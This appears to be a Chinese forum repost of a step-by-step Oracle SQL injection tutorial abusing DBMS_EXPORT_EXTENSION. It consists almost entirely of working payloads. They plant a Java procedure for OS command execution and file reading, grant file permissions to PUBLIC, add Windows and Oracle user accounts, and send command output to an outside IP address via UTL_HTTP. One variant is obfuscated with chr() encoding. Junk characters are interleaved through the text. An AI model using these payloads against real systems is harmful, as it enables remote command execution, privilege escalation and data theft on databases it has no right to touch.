以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成
+ n/ D! G" H% l6 z+ }1 {. g/ b* x7 D0 i9 _! m5 i
/xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
6 Z! a9 Z+ Q" ?& z的形式即可。(用" 'a'|| "是为了让语句返回true值)
) {. d: C* I2 h5 I0 w' l语句有点长,可能要用post提交。 ; G+ X& Y1 Q' E0 G
以下是各个步骤:
! g8 ]3 X: h; e% H6 G# r9 D8 ?5 y) F8 g1.创建包
7 ?( w {: y/ B, p通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:: T! m- m8 M" f9 o/ O* c+ s/ B
/xxx.jsp?id=1 and '1'<>'a'||( ( C; K# ^3 z3 w5 t
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''+ m. W% L O* g& v5 x
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(' C% p J* b1 E, k$ h+ w7 t* ]
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}- `+ _. c" K [5 i5 w
}'''';END;'';END;--','SYS',0,'1',0) from dual
, I$ e+ S8 H* ~5 {% c)
& U6 o% D2 U% k: C------------------------
( b7 @1 I5 Y. P3 E0 ~如果url有长度限制,可以把readFile()函数块去掉,即:
$ z! X5 m; {* `) o' `/xxx.jsp?id=1 and '1'<>'a'||(
3 L: W% C" \$ p0 [# r4 ]select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''3 G' G# g* x3 x3 ?
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
/ b' c. i- ~2 _/ \new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
6 i9 p6 e' q# P}'''';END;'';END;--','SYS',0,'1',0) from dual
4 U0 z1 t# v( o, Z) q) # n: |3 X$ ]2 n" g$ E. w5 j. G
同时把后面步骤 提到的 对readFile()的处理语句去掉。
+ z+ F+ ]! E0 a+ r3 K9 M------------------------------
" ?" U5 J) x+ J5 }, B2.赋Java权限 ; p7 f" G& z8 K; t
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual/ _& c- ]- o3 E- e+ I: n
3.创建函数 A: j( F3 d6 F5 ]1 [
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''+ u# Q9 C9 Z* L/ V8 \3 Y
create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual0 {5 s0 I, F4 B- B; L) p
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''$ O X, n) E2 @/ s4 c- b
create or replace function LinxReadFile(filename in varchar2) return varchar2 as language java name ''''''''LinxUtil.readFile(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual
9 P6 f+ c n+ l4.赋public执行函数的权限
1 O' h. X% U9 J, ~& tselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
S# S# P1 s" Q3 t2 f: @select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual# V2 Y, L/ k9 k+ L$ j
5.测试上面的几步是否成功
9 `& a5 B* R5 p( X) F4 y( f) Qand '1'<>'11'||(
# r% ~& P& n( f7 A0 gselect OBJECT_ID from all_objects where object_name ='LINXRUNCMD' 2 x! f5 ?& e% j F4 B& `- |$ I
) 2 e4 W, s# ?) n
and '1'<>(
" d4 H5 g/ E5 R4 P) |' \5 yselect OBJECT_ID from all_objects where object_name ='LINXREADFILE'
" h! b P/ h% {1 \4 o' a5 z" _)
% d* P' d3 k8 m V5 R/ ?6 D- T6.执行命令: ! v5 h$ {% i" i" a2 _, N# z
/xxx.jsp?id=1 and '1'<>( * x4 f; f+ l \, y3 D6 k
select sys.LinxRunCMD('cmd /c net user linx /add') from dual - u2 k" y* x: T; n" [2 n5 M( n0 p
3 y" O1 }- {- Q" o3 C) 7 X: z, C2 ?' E! ~
/xxx.jsp?id=1 and '1'<>( 7 ?, |+ r3 w1 L8 m- M2 R6 R
select sys.LinxReadFile('c:/boot.ini') from dual
$ M O& I% L C& R5 b
& [. S7 \* d3 Y |5 W0 U)
* ?5 U! V. p6 A: F) w
l# r5 ?, A* t3 G1 n3 Q( `注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。 4 o4 Q: G" J4 K; h0 q9 E2 s. }$ k0 K/ ]
如果要查看运行结果可以用 union : ; O8 n5 A* Q! M: d* o, q! s/ a
/xxx.jsp?id=1 union select sys.LinxRunCMD('cmd /c net user linx /add') from dual' {4 N+ B8 R! {5 Z
或者UTL_HTTP.request(: 7 B3 M9 M3 ?* K6 Z/ W4 T n) j
/xxx.jsp?id=1 and '1'<>( ; i$ `4 y% j2 ]9 a% o6 V
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual
3 v% g/ E g `% K5 i$ G)
, n$ w! P" c: d' ?& U/xxx.jsp?id=1 and '1'<>( ' z& I5 a2 }0 ^% Y, Y
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
, `& S( ^$ _" p3 {)
7 s! l& @0 a! \+ Z2 C4 e# D注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。
: ]- A, U' `" @--------------------
1 T _0 ?1 J$ S6 z6.内部变化
! }7 H. [. ~% a通过以下命令可以查看all_objects表达改变:
7 k9 a& `$ C+ f) }( d! s4 fselect * from all_objects where object_name like '%LINX%' or object_name like '%Linx%'
" L; D l6 Z, r7 v8 F7.删除我们创建的函数
b! \. ~5 s/ \/ N4 @select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''& k& F! p2 ~6 K
drop function LinxRunCMD '''';END;'';END;--','SYS',0,'1',0) from dual & A. F; ^# o$ K8 p& c6 s. v
==================================================== 8 @: H9 y( R+ ~# A( Z' s
全文结束。谨以此文赠与我的朋友。
2 C! F& ?9 [1 ?; elinx
6 X! p1 p3 A" n124829445
0 P0 H4 H5 @ N% h( ^1 Y0 x: y2008.1.12
9 m' y) n4 |8 c$ k; }0 jlinyujian@bjfu.edu.cn
& Q" z7 a5 o6 J9 n' q====================================================================== $ N$ ~2 f& m* ]8 ^
测试漏洞的另一方法: ( S9 [0 j3 p" U0 `5 A
创建oracle帐号:
3 s1 J5 ^! k. e Y# nselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''* Q0 u$ a. P7 r! G& @4 M- X
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual9 @# y- e% G5 ~
即: 6 h, `* C+ l0 k* |% w
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
% _- M- I& S1 u, H; Y5 t' bchr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual $ Q; E$ i2 E5 J# K
确定漏洞存在:
' s, S6 ?6 l* }1 d1<>( " A4 H% ?" x# C/ ], e3 H8 O3 c
select user_id from all_users where username='LINXSQL' . Q8 v" W0 {2 N* h8 {0 P# Q
) 1 f, E8 l/ _% J. ~) u2 |
给linxsql连接权限:
0 t9 s( L$ \- I- R$ Xselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
5 l4 q4 ~' } P" l8 V+ F7 hGRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual 1 A# X$ _0 j! W
删除帐号: 5 c7 }; t0 e4 }, {/ v1 X& E
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
- W9 ~; U5 A5 |drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual % x+ P% s3 v/ g& w h$ G5 ?
======================
0 K R' c6 Y. {! u2 @( R以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:7 ~7 ]+ c6 t! h2 q4 C0 s" ?3 ]9 y
1.jsp?id=1 and '1'<>(
8 g) O; D$ C% [4 H- Bselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''% W' A/ ~$ H& Z- C8 s* V
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1; end; '''';END;'';END;--','SYS',0,'1',0) from dual& b$ x+ X8 V. f+ Y2 k5 o4 ?4 i
) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE
+ u2 s4 e. i1 u% l& a4 s9 a )
% L% V- J# l, S" X) F* q% N# L9 D. U/ `' C
. X0 @) Q2 o2 J& x# J9 f) [8 [
) t' H0 j. U$ B( m |
发表于 2012-12-18 12:21:48
收藏
支持
反对